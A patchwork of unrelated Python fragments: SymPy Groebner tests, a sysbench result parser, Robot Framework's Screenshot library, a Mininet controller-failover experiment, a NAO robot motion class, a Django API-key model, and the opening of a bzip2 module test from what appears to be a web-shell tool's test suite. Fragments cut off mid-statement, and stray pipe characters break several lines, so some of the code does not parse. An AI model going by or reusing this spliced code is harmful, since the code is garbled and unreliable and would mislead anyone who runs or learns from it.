    assert _strict_eq(reduced(f, G, polys=True), (Q, r))
    assert _strict_eq(reduced(f, G, x, y, polys=True), (Q, r))
    H = groebner(G, polys=True)
    assert _strict_eq(H.reduce(f), (Q, r))
    f = 2*x**3 + y**3 + 3*y
    G = groebner([x**2 + y**2 - 1, x*y - 2])
    Q = [x**2 - x*y**3/2 + x*y/2 + y**6/4 - y**4/2 + y**2/4, -y**5/4 + y**3/2 + 3*y/4]
    r = 0
    assert reduced(f, G) == (Q, r)
    assert G.reduce(f) == (Q, r)
    # Without auto-reduction the remainder is nonzero.
    assert reduced(f, G, auto=False)[1] != 0
    assert G.reduce(f, auto=False)[1] != 0
    assert G.contains(f) is True
    assert G.contains(f + 1) is False
    assert reduced(1, [1], x) == ([1], 0)
    raises(ComputationFailed, lambda: reduced(1, [1]))
def test_groebner():
    """Groebner bases in lex/grevlex orders, expr and Poly forms, and mod 7."""
    assert groebner([], x, y, z) == []
    assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex') == [1 + x**2, -1 + y**4]
    assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex') == [-1 + y**4, z**3, 1 + x**2]
    assert groebner([x**2 + 1, y**4*x + x**3], x, y, order='lex', polys=True) == \
        [Poly(1 + x**2, x, y), Poly(-1 + y**4, x, y)]
    assert groebner([x**2 + 1, y**4*x + x**3, x*y*z**3], x, y, z, order='grevlex', polys=True) == \
        [Poly(-1 + y**4, x, y, z), Poly(z**3, x, y, z), Poly(1 + x**2, x, y, z)]
    assert groebner([x**3 - 1, x**2 - 1]) == [x - 1]
    assert groebner([Eq(x**3, 1), Eq(x**2, 1)]) == [x - 1]
    # Modular (GF(7), non-symmetric representation) basis, then verify that
    # the reduction identity f == sum(q*g) + r holds.
    F = [3*x**2 + y*z - 5*x - 1, 2*x + 3*x*y + y**2, x - 3*y + x*z - 2*z**2]
    f = z**9 - x**2*y**3 - 3*x*y**2*z + 11*y*z**2 + x**2*z**2 - 5
    G = groebner(F, x, y, z, modulus=7, symmetric=False)
    assert G == [1 + x + y + 3*z + 2*z**2 + 2*z**3 + 6*z**4 + z**5,
                 1 + 3*y + y**2 + 6*z**2 + 3*z**3 + 3*z**4 + 3*z**5 + 4*z**6,
                 1 + 4*y + 4*z + y*z + 4*z**3 + z**4 + z**6,
                 6 + 6*z + z**2 + 4*z**3 + 3*z**4 + 6*z**5 + 3*z**6 + z**7]
    Q, r = reduced(f, G, x, y, z, modulus=7, symmetric=False, polys=True)
    assert sum([ q*g for q, g in zip(Q, G.polys)], r) == Poly(f, modulus=7)
|
mbers reported by each reporting
interval, and the summary latency numbers printed at the end of the run in
"General Statistics" -> "Response Time".
Example Sysbench output:
sysbench 0.5: multi-threaded system evaluation benchmark
<... lots of output we don't care here ...>
Threads started!
[ 2s] threads: 16, tps: 526.38, reads: 7446.79, writes: 2105.52, response
time: 210.67ms (99%), errors: 0.00, reconnects: 0.00
< .... lots of tps output every 2 second, we need all those>
< ... lots of other output we don't care for now...>
General statistics:
total time: 17.0563s
total number of events: 10000
total time taken by event execution: 272.6053s
response time:
min: 18.31ms
avg: 27.26ms
max: 313.50ms
approx. 99 percentile: 57.15ms
< We care about the response time section above, these are latency numbers>
< then there are some outputs after this, we don't care either>
Args:
sysbench_output: The output from sysbench.
results: The dictionary to store results based on sysbench output.
metadata: The metadata to be passed along to the Samples class.
"""
all_tps = []
seen_general_statistics = False
seen_response_time = False
response_times = {}
sysbench_output_io = StringIO.StringIO(sysbench_output)
for line in sysbench_output_io.readlines():
if re.match('^\[', line):
tps = re.findall('tps: (.*?),', line)
all_tps.append(float(tps[0]))
continue
if line.startswith('General statistics:'):
seen_general_statistics = True
continue
if seen_general_statistics:
if re.match('^ +response time:.*', line):
seen_response_time = True
continue
if seen_general_statistics and seen_response_time:
for token in RESPONSE_TIME_TOKENS:
search_string = '.*%s: +(.*)ms' % token
if re.findall(search_string, line):
response_times | [token] = float(re.findall(search_string, line)[0])
tps_line = ', '.join(map(str, all_tps))
# Print all tps data points in the log for reference. And report
# percentiles of these tps data in the final result set.
logging.info('All TPS numbers: \n %s', tps_line)
tps_percentile = sample.PercentileCalculator(all_tps)
for percentile in sample.PERCENTILES_LIST:
percentile_string = 'p | %s' % str(percentile)
logging.info('%s tps %f', percentile_string,
tps_percentile[percentile_string])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, percentile_string)
results.append(sample.Sample(
metric_name,
tps_percentile[percentile_string],
NA_UNIT,
metadata))
# Also report average, stddev, and coefficient of variation
for token in ['average', 'stddev']:
logging.info('tps %s %f', token, tps_percentile[token])
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, token)
results.append(sample.Sample(
metric_name,
tps_percentile[token],
NA_UNIT,
metadata))
if tps_percentile['average'] > 0:
cv = tps_percentile['stddev'] / tps_percentile['average']
logging.info('tps coefficient of variation %f', cv)
metric_name = ('%s %s') % (SYSBENCH_RESULT_NAME_TPS, 'cv')
results.append(sample.Sample(
metric_name,
cv,
NA_UNIT,
metadata))
# Now, report the latency numbers.
for token in RESPONSE_TIME_TOKENS:
logging.info('%s_response_time is %f', token, response_times[token])
metric_name = '%s %s' % (SYSBENCH_RESULT_NAME_LATENCY, token)
if token == 'percentile':
metric_name = '%s %s' % (metric_name, FLAGS.sysbench_latency_percentile)
results.append(sample.Sample(
metric_name,
response_times[token],
MS_UNIT,
metadata))
def _GetSysbenchCommandPrefix():
    """ Decides what the prefix is for sysbench command based on os type.

    Returns:
      A string representing the sysbench command prefix.
    """
    if FLAGS.os_type == 'rhel':
        return vm_util.VM_TMP_DIR
    return NORMAL_SYSBENCH_PATH_PREFIX
def _IssueSysbenchCommand(vm, duration):
    """Issue a sysbench OLTP run command on the given VM.

    Does nothing when duration is not positive.

    Args:
        vm: The test VM to issue the command to.
        duration: The duration of the sysbench run, in seconds.

    Returns:
        (stdout, stderr) of the remote command; both are empty strings when
        duration <= 0.
    """
    if duration <= 0:
        return '', ''
    oltp_script_path = '%s%s' % (_GetSysbenchCommandPrefix(), OLTP_SCRIPT_PATH)
    run_cmd = ' '.join([
        'sysbench',
        '--test=%s' % oltp_script_path,
        '--mysql_svc_oltp_tables_count=%d' % FLAGS.mysql_svc_oltp_tables_count,
        '--oltp-table-size=%d' % FLAGS.mysql_svc_oltp_table_size,
        '--rand-init=%s' % RAND_INIT_ON,
        '--db-ps-mode=%s' % DISABLE,
        '--oltp-dist-type=%s' % UNIFORM,
        '--oltp-read-only=%s' % OFF,
        '--num-threads=%d' % FLAGS.sysbench_thread_count,
        '--percentile=%d' % FLAGS.sysbench_latency_percentile,
        '--report-interval=%d' % FLAGS.sysbench_report_interval,
        '--max-requests=0',
        '--max-time=%d' % duration,
        '--mysql-user=%s' % vm.db_instance_master_user,
        '--mysql-password="%s"' % vm.db_instance_master_password,
        '--mysql-host=%s' % vm.db_instance_address,
        'run',
    ])
    stdout, stderr = vm.RobustRemoteCommand(run_cmd)
    logging.info('Sysbench results: \n stdout is:\n%s\nstderr is\n%s',
                 stdout, stderr)
    return stdout, stderr
def _RunSysbench(vm, metadata):
""" Runs the Sysbench OLTP test.
The test is run on the DB instance as indicated by the vm.db_instance_address.
Args:
vm: The client VM that will issue the sysbench test.
metadata: The PKB metadata to be passed along to the final results.
Returns:
Results: A list of results of this run.
"""
results = []
if not hasattr(vm, 'db_instance_address'):
logging.error(
'Prepare has likely failed, db_instance_address is not found.')
raise DBStatusQueryError('RunSysbench: DB instance address not found.')
# Create the sbtest database for Sysbench.
# str(uuid.uuid4())[-8:]
create_sbtest_db_cmd = ('mysql -h %s -u %s -p%s '
'-e \'create database sbtest;\'') % (
vm.db_instance_address,
vm.db_instance_master_user,
vm.db_instance_master_password)
stdout, stderr = vm.RemoteCommand(create_sbtest_db_cmd)
logging.info('sbtest db created, stdout is %s, stderr is %s',
stdout, stderr)
# Provision the Sysbench test based on the input flags (load data into DB)
# Could take a long time if the data to be loaded is large.
data_load_start_time = time.time()
prepare_script_path = '%s%s' % (_GetSysbenchCommandPrefix(),
PREPARE_SCRIPT_PATH)
data_load_cmd_tokens = ['sysbench',
'--test=%s' % prepare_script_path,
'--mysql_svc_oltp_tables_count=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--oltp-table-size=%d' %
FLAGS.mysql_svc_oltp_table_size,
'--rand-init=%s' % RAND_INIT_ON,
'--num-threads=%d' %
FLAGS.mysql_svc_oltp_tables_count,
'--mysql-user=%s' % vm.db_instance_master_user,
'--mysql-password="%s"' %
vm.db_instance_master_password,
'--mysql-host=%s' % vm.db_instance_address, |
port Toolkit, Robot, Rectangle
from javax.imageio import ImageIO
from java.io import File
elif sys.platform == 'cli':
import clr
clr.AddReference('System.Windows.Forms')
clr.AddReference('System.Drawing')
from System.Drawing import Bitmap, Graphics, Imaging
from System.Windows.Forms import Screen
else:
try:
import wx
except ImportError:
wx = None
try:
from gtk import gdk
except ImportError:
gdk = None
try:
from PIL import ImageGrab # apparently available only on Windows
except ImportError:
ImageGrab = None
from robot import utils
from robot.api import logger
from robot.libraries.BuiltIn import BuiltIn
from robot.version import get_version
class Screenshot(object):
"""Test library for taking screenshots on the machine where tests are run.
Notice that successfully taking screenshots requires tests to be run with
a physical or virtual display.
This library was heavily enhanced in Robot Framework 2.5.5 release. Old
keywords for taking screenshots were deprecated and they have since been
removed.
= Using with Python =
With Python you need to have one of the following modules installed to be
able to use this library. The first module that is found will be used.
- wxPython :: http://wxpython.org :: Required also by RIDE so many Robot
Framework users already have this module installed.
- PyGTK :: http://pygtk.org :: This module is available by default on most
Linux distributions.
- Python Imaging Library (PIL) :: http://www.pythonware.com/products/pil ::
This module can take screenshots only on Windows.
= Using with Jython and IronPython =
With Jython and IronPython this library uses APIs provided by JVM and .NET
platforms, respectively. These APIs are always available and thus no
external modules are needed.
IronPython support was added in Robot Framework 2.7.5.
= Where screenshots are saved =
By default screenshots are saved into the same directory where the Robot
Framework log file is written. If no log is created, screenshots are saved
into the directory where the XML output file is written.
It is possible to specify a custom location for screenshots using
`screenshot_directory` argument in `importing` and `Set Screenshot Directory`
keyword during execution. It is also possible to save screenshots using
an absolute path.
"""
ROBOT_LIBRARY_SCOPE = 'TEST SUITE'
ROBOT_LIBRARY_VERSION = get_version()
def __init__(self, screenshot_directory=None):
    """Configure where screenshots are saved.

    If `screenshot_directory` is not given, screenshots are saved into the
    same directory as the log file. The directory can also be changed
    during execution with the `Set Screenshot Directory` keyword.

    Examples (use only one of these):
    | =Setting= | =Value= | =Value= | =Value= |
    | Library | Screenshot | | # Default location |
    | Library | Screenshot | ${TEMPDIR} | # System temp |
    """
    normalized = self._norm_path(screenshot_directory)
    self._given_screenshot_dir = normalized
    self._screenshot_taker = ScreenshotTaker()
def _norm_path(self, path):
    """Normalize `path`, mapping '/' separators to the OS separator.

    Falsy values (None, empty string) are returned unchanged.
    """
    if path:
        return os.path.normpath(path.replace('/', os.sep))
    return path
@property
def _screenshot_dir(self):
    """Effective screenshot directory: the configured one, or the log dir."""
    return self._given_screenshot_dir if self._given_screenshot_dir else self._log_dir
@property
def _log_dir(self):
    """Directory of the current log file (or output dir when no log is made)."""
    variables = BuiltIn().get_variables()
    outdir = variables['${OUTPUTDIR}']
    logfile = variables['${LOGFILE}']
    # 'NONE' means logging is disabled; fall back to the output directory.
    subdir = os.path.dirname(logfile) if logfile != 'NONE' else '.'
    return self._norm_path(os.path.join(outdir, subdir))
def set_screenshot_directory(self, path):
    """Sets the directory where screenshots are saved.

    It is possible to use `/` as a path separator in all operating systems.
    Path to the old directory is returned.

    The directory can also be set in `importing`.
    """
    path = self._norm_path(path)
    if not os.path.isdir(path):
        raise RuntimeError("Directory '%s' does not exist." % path)
    previous = self._screenshot_dir
    self._given_screenshot_dir = path
    return previous
def take_screenshot(self, name="screenshot", width="800px"):
    """Takes a screenshot in JPEG format and embeds it into the log file.

    The file name is derived from `name`: with a `.jpg`/`.jpeg` extension
    that exact name is used, otherwise an underscore, a running index and
    an extension are appended to make the name unique. The name is
    relative to the log file directory; absolute paths and `/` separators
    work on all operating systems.

    `width` specifies the size of the embedded image in the log file.

    Examples: (LOGDIR is determined automatically by the library)
    | Take Screenshot | | | # LOGDIR/screenshot_1.jpg (auto index) |
    | Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (auto index) |
    | Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always this file) |
    | Take Screenshot | images/login.jpg | 80% | # Name and width. |
    | Take Screenshot | width=550px | | # Only width. |

    The path where the screenshot is saved is returned.
    """
    saved_path = self._save_screenshot(name)
    self._embed_screenshot(saved_path, width)
    return saved_path
def take_screenshot_without_embedding(self, name="screenshot"):
    """Takes a screenshot and links it from the log file.

    Otherwise identical to `Take Screenshot`, but the image is only
    linked from the log, not embedded into it.
    """
    saved_path = self._save_screenshot(name)
    self._link_screenshot(saved_path)
    return saved_path
def _save_screenshot(self, basename, directory=None):
    """Resolve a target path for `basename` and take the screenshot there."""
    target = self._get_screenshot_path(basename, directory)
    return self._screenshot_to_file(target)
def _screenshot_to_file(self, path):
    """Take a screenshot into `path`; failures are logged, never raised."""
    path = self._validate_screenshot_path(path)
    logger.debug('Using %s modules for taking screenshot.'
                 % self._screenshot_taker.module)
    try:
        self._screenshot_taker(path)
    except:
        # Best effort: taking a screenshot must never fail the test itself.
        error = utils.get_error_message()
        logger.warn('Taking screenshot failed: %s\n'
                    'Make sure tests are run with a physical or virtual display.'
                    % error)
    return path
def _validate_screenshot_path(self, path):
    """Return `path` absolute and normalized; fail if its directory is missing."""
    path = utils.abspath(self._norm_path(path))
    parent = os.path.dirname(path)
    if not os.path.exists(parent):
        raise RuntimeError("Directory '%s' where to save the screenshot "
                           "does not exist" % parent)
    return path
def _get_screenshot_path(self, basename, directory):
    """Build the target file path.

    An explicit `.jpg`/`.jpeg` basename is used verbatim; any other name
    gets the first unused `<basename>_<index>.jpg` in the directory.
    """
    base_dir = self._norm_path(directory) if directory else self._screenshot_dir
    if basename.lower().endswith(('.jpg', '.jpeg')):
        return os.path.join(base_dir, basename)
    index = 1
    while True:
        candidate = os.path.join(base_dir, "%s_%d.jpg" % (basename, index))
        if not os.path.exists(candidate):
            return candidate
        index += 1
def _embed_screenshot(self, path, width):
    """Log an HTML snippet embedding the image, linked relative to the log dir."""
    rel = utils.get_link_path(path, self._log_dir)
    markup = '<a href="%s"><img src="%s" width="%s"></a>' % (rel, rel, width)
    logger.info(markup, html=True)
def _link_screenshot(self, path):
link = utils.get_link_path(path, self._log_dir)
logger |
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
# Number of host/switch pairs in the linear topology.
HOSTS = 3
# Stdout/stderr sinks for the two POX controller subprocesses.
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
    """Insert an iptables INPUT rule that DROPs TCP traffic to `port`."""
    drop_rule = iptc.Rule()
    drop_rule.protocol = "tcp"
    tcp_match = drop_rule.create_match("tcp")
    tcp_match.dport = str(port)
    drop_rule.target = drop_rule.create_target("DROP")
    input_chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
    input_chain.insert_rule(drop_rule)
def unClosePort(port):
    """Remove the DROP rule previously inserted by closePort(port)."""
    drop_rule = iptc.Rule()
    drop_rule.protocol = "tcp"
    tcp_match = drop_rule.create_match("tcp")
    tcp_match.dport = str(port)
    drop_rule.target = drop_rule.create_target("DROP")
    input_chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
    input_chain.delete_rule(drop_rule)
def myNet():
    """Run the controller-failover experiment.

    Builds a linear topology of HOSTS host/switch pairs, each switch
    connected to two remote POX controllers, starts an hping3 flood from
    h0 to h1, then firewalls the master controller's port and measures
    how long the standby controller takes to become master of every
    switch (polled via ovs-vsctl).

    Uses globals p1/p2 so the caller owns the POX subprocess handles.
    Cleanups removed unused locals (kill, con66, rownum), the unused
    global p3/p4 declarations and commented-out dead code.
    """
    global p1
    global p2
    cPort1 = 6666
    cPort2 = 6667
    hosts = []
    net = Mininet(topo=None, build=False, autoSetMacs=True)
    con1 = net.addController('c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
    con2 = net.addController('c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
    for x in range(0, HOSTS):
        hostname = "h%d" % (x)
        switchname = "s%d" % (x)
        host = net.addHost(hostname)
        switch = net.addSwitch(switchname)
        # Chain switches into a line: s0 - s1 - ... - sN.
        if x != 0:
            net.addLink(switch, lastswitch)
        lastswitch = switch
        net.addLink(host, switch)
        net.build()
        switch.start([con1, con2])
        hosts.append(host)
    net.start()
    tping = time.time()
    print('h0 ping : %.10f' % tping)
    hosts[0].cmdPrint('hping3 -c 200 -i u20000 ', hosts[1].IP(), ' > logs-example/log.ping12.txt 2>&1 &')
    # 20ms every ping * 200 -> 4s
    while True:
        tcur = time.time()
        if tcur - tping > 2:  # after 2s running
            print('close port %i in %.10f' % (cPort1, tcur))
            closePort(cPort1)
            break
    print('START C2 AS MASTER at %.10f' % time.time())
    p2 = subprocess.Popen(['pox/pox.py', "master67"], stdin=subprocess.PIPE,
                          stdout=p2_log, stderr=p2_log, preexec_fn=os.setpgrp)
    # Poll OVS until every switch reports the standby controller as master.
    while True:
        p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"],
                             stdout=subprocess.PIPE)
        output, err = p.communicate()
        f = StringIO.StringIO(output)
        reader = csv.reader(f, delimiter=',')
        con67 = []
        for row in reader:
            uuid = row[0]
            role = row[13]
            target = row[15]
            if target.find(str(cPort2)) != -1 and role == 'master':
                con67.append(uuid)
        f.close()
        if len(con67) == HOSTS:
            uptime = time.time()
            print('new master ready at %.10f' % uptime)
            break
    print('now wait for hping3 to finish..')
    hosts[0].cmdPrint('wait %hping3')
    print('hping3 finished at %.10f' % time.time())
    print('open the port..')
    unClosePort(cPort1)
    print('stopping mininet')
    net.stop()
    print('stopping pox(s)..')
    p1.terminate()
    p2.terminate()
    print('timestamp difference %.10f' % (uptime - tcur))
if __ | name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os. | setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate() |
)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
    """Emit a timestamped message via the configured log function, else the logger."""
    line = str(datetime.now()) + "|" + msg
    if self.log_function:
        self.log_function(line)
    else:
        self.logger.debug(line)
###################################
# text to speech
###################################
def say(self, text):
    """Queue text-to-speech without blocking; returns self for chaining."""
    self.env.tts.post.say(text)
    return self
def say_and_block(self, text):
    """Speak `text` and block until finished; returns self for chaining."""
    self.env.tts.say(text)
    return self
def wait(self, seconds):
    """Sleep for `seconds`; returns self for chaining."""
    time.sleep(seconds)
    return self
###################################
# Postures
###################################
def stand_init(self, speed=.5):
    """Queue the StandInit posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
    job = self.env.robotPosture.post.goToPosture("StandInit", speed)
    self.jobs.append(job)
    self.go()
    return self
def sit_relax(self, speed=.5):
    """Queue the SitRelax posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
    job = self.env.robotPosture.post.goToPosture("SitRelax", speed)
    self.jobs.append(job)
    self.go()
    return self
def stand_zero(self, speed=.5):
    """Queue the StandZero posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
    job = self.env.robotPosture.post.goToPosture("StandZero", speed)
    self.jobs.append(job)
    self.go()
    return self
def lying_belly(self, speed=.5):
    """Queue the LyingBelly posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
    job = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
    self.jobs.append(job)
    self.go()
    return self
def lying_back(self, speed=.5):
    """Queue the LyingBack posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
    job = self.env.robotPosture.post.goToPosture("LyingBack", speed)
    self.jobs.append(job)
    self.go()
    return self
def stand(self, speed=.5):
    """Go to the Stand posture, blocking until the move finishes."""
    self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
    self.env.robotPosture.goToPosture("Stand", speed)
    self.env.motion.waitUntilMoveIsFinished()
    return self
def crouch(self, speed=.5):
    """Queue the Crouch posture and wait for completion via go()."""
    self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
    job = self.env.robotPosture.post.goToPosture("Crouch", speed)
    self.jobs.append(job)
    self.go()
    return self
def sit(self, speed | =.5):
self.log("goToPosture=%s|speed=%s" % ("Sit", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
def stiff(self):
    """Raise stiffness on the whole body to 1.0 over one second."""
    self.env.motion.stiffnessInterpolation(self.joints.Chains.Body, 1.0, 1.0)
    return self
def rest(self):
    """Put the robot into its safe rest state; returns self for chaining."""
    self.env.motion.rest()
    return self
def relax(self):
    """Drop stiffness on the whole body to 0 over one second."""
    self.env.motion.stiffnessInterpolation(self.joints.Chains.Body, 0, 1.0)
    return self
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
    """Disable whole-body motion/balance control."""
    self.log("wbDisable")
    self.env.motion.wbEnable(False)
def whole_body_enable(self):
    """Enable whole-body motion/balance control."""
    self.log("wbEnable")
    self.env.motion.wbEnable(True)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
    """Constrain the foot state for whole-body control.

    supportLeg: Legs, LLeg or RLeg.
    stateName: Fixed, Plane or Free.
    """
    self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
    self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
    """Enable the balance constraint within the support polygon.

    supportLeg: Legs, LLeg or RLeg.
    """
    self.env.motion.wbEnableBalanceConstraint(True, supportLeg)
def balance(self, leg, duration):
    """Shift the center of mass over the given support leg.

    Args:
        leg: support leg to balance on ("LLeg", "RLeg" or "Legs").
        duration: time in seconds; non-positive values fall back to the
            global default via determine_duration().
    """
    duration = self.determine_duration(duration)
    # Stiffen the body before enabling whole-body control.
    self.stiff()
    # BUG FIX: was self.whole_body_endable() -- a typo for the method
    # defined on this class, which raised AttributeError at runtime.
    self.whole_body_enable()
    self.foot_state()
    self.constrain_motion()
    # Move the center of mass over the support leg, then release control.
    self.env.motion.wbGoToBalance(leg, duration)
    self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
    """Set the global default movement duration; returns self for chaining."""
    self.globalDuration = durationInSeconds
    return self
def determine_duration(self, durationInSeconds):
    """Return `durationInSeconds` when positive, else the global default."""
    return durationInSeconds if durationInSeconds > 0 else self.globalDuration
###################################
# blocking
###################################
def go(self):
    """Block until every queued motion job finishes, then clear the queue."""
    for job in self.jobs:
        self.log("taskId=%s|action=wait" % (job))
        started = datetime.now()
        # 8 second timeout per queued task.
        self.env.motion.wait(job, 8000)
        elapsed = datetime.now() - started
        self.log("taskId=%s|action=done|seconds=%s" % (job, elapsed.total_seconds()))
    self.jobs[:] = []
    self.log("done")
    return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
    """Queue an absolute angle interpolation job for `chain`."""
    job = self.env.motion.post.angleInterpolation(
        chain, angleListInRadians, timeListInSeconds, True)
    self.log("|taskId=%s|chain=%s|angleList=%s" % (job, chain, angleListInRadians))
    self.jobs.append(job)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
    """Move one joint to `angleInDegrees` over `durationInSeconds`."""
    self.move(jointName, [angleInDegrees * almath.TO_RAD], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
    """Return `angle` repeated once for every joint in `chain`."""
    return [angle] * len(self.env.motion.getJointNames(chain))
def get_max_degrees_per_second(self, jointName):
    """Return the joint's maximum angular speed in degrees per second."""
    limits = self.env.motion.getLimits(jointName)
    # limits[0] is [minAngle, maxAngle, maxChange]; maxChange is in rad/s.
    return math.degrees(limits[0][2])
def get_fraction_max_speed(self, jointName, desiredPositionInDegrees, executionTimeInSeconds):
# current position in degrees
useSensors = False;
currentPositionInDegrees = math.degrees(self.env.motion.getAngles(jointName, useSensors)[0]);
#self.log("pos in deg: " + str(currentPositionInDegrees))
# distance
distanceInDegrees = abs(currentPositionInDegrees - desiredPositionInDegrees)
#self.log("distance: " + str(distanceInDegrees))
# max speed
maxDegreesPerSecond = self.get_max_degrees_per_second(jointName)
# fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
if fraction |
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_compatible
class APIKey(ModelBase):
    """A developer's key/secret pair to access the API."""

    id = PositiveAutoField(primary_key=True)
    user = models.ForeignKey(UserProfile, related_name='api_keys')
    # A user can only have one active key at a time (unique db constraint
    # below). Old revoked keys are kept, so inactive keys are marked with
    # NULL (never False): multiple NULLs do not violate the constraint.
    is_active = models.NullBooleanField(default=True)
    type = models.PositiveIntegerField(
        choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
    key = models.CharField(max_length=255, db_index=True, unique=True)
    # TODO: use RSA public keys instead? If we were to use JWT RSA keys
    # then we'd only need to store the public key.
    secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')

    class Meta:
        db_table = 'api_key'
        unique_together = (('user', 'is_active'),)

    def __str__(self):
        return (
            u'<{cls} user={user}, type={type}, key={key} secret=...>'
            .format(cls=self.__class__.__name__, key=self.key,
                    type=self.type, user=self.user))

    @classmethod
    def get_jwt_key(cls, **kwargs):
        """Return the single active symmetric-JWT APIKey for a user or key."""
        kwargs['is_active'] = True
        return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)

    @classmethod
    def new_jwt_credentials(cls, user):
        """Create a fresh key/secret pair suitable for symmetric JWT signing.

        Must be run within a db transaction. Returns an APIKey instance.
        """
        new_key = cls.get_unique_key('user:{}:'.format(user.pk))
        return cls.objects.create(
            key=new_key, secret=cls.generate_secret(32),
            type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)

    @classmethod
    def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
        """Return `prefix` plus a short random suffix not already in the db.

        Raises RuntimeError when no unused key is found in `max_tries`
        attempts.
        """
        while True:
            if try_count >= max_tries:
                raise RuntimeError(
                    'a unique API key could not be found after {} tries'
                    .format(max_tries))
            candidate = '{}{}'.format(prefix, random.randint(0, 999))
            if not cls.objects.filter(key=candidate).exists():
                return candidate
            try_count += 1

    @staticmethod
    def generate_secret(byte_length):
        """Return a hex string holding `byte_length` bytes of OS randomness.

        The result is suitable for cryptography and twice `byte_length`
        characters long. `byte_length` must be at least 32 (256 bits).
        """
        if byte_length < 32:
            raise ValueError(
                '{} is too short; secrets must be longer than 32 bytes'
                .format(byte_length))
        return force_text(binascii.b2a_hex(os.urandom(byte_length)))
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
    """Tests for the file_bzip2 module: compression round-trips and edge cases."""

    # Raw binary payloads written into the bzip2 fixture files.
    binstring = [
        b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
        b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
    ]
    # Paths of the uncompressed fixture files.
    uncompressed = [
        os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
        os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
    ]
    # Paths of the corresponding bzip2 archives.
    compressed = [
        os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
        os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
    ]

    def setUp(self):
        """Load the modules and create the bzip2 fixtures on the target."""
        session = SessionURL(self.url, self.password, volatile = True)
        modules.load_modules(session)
        subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
